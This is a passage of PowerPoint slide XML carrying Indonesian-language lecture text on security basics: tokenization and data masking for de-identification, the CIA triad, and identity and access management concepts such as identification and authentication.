            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibalik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Tokenisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengganti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perspektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peraturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bidang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dienkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>asli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyembunyian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tokenisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghilangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. De-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengaburkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> basis data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibagikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengorbankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>privasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>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59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2858402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Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memenuhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> triad CIA. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengatur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagaimana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>subjek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prinsipal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berinteraksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>objek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Subjek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> orang, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meminta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Objek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Objek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berupa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, server, basis data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Subjek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diberi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>izin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> modern </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (IAM). IAM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terdiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>empat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Identifikasi-membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ID yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>unik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mewakili</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Autentikasi-membuktikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>subjek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diklaimnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencoba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Faktor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>subjek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, orang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
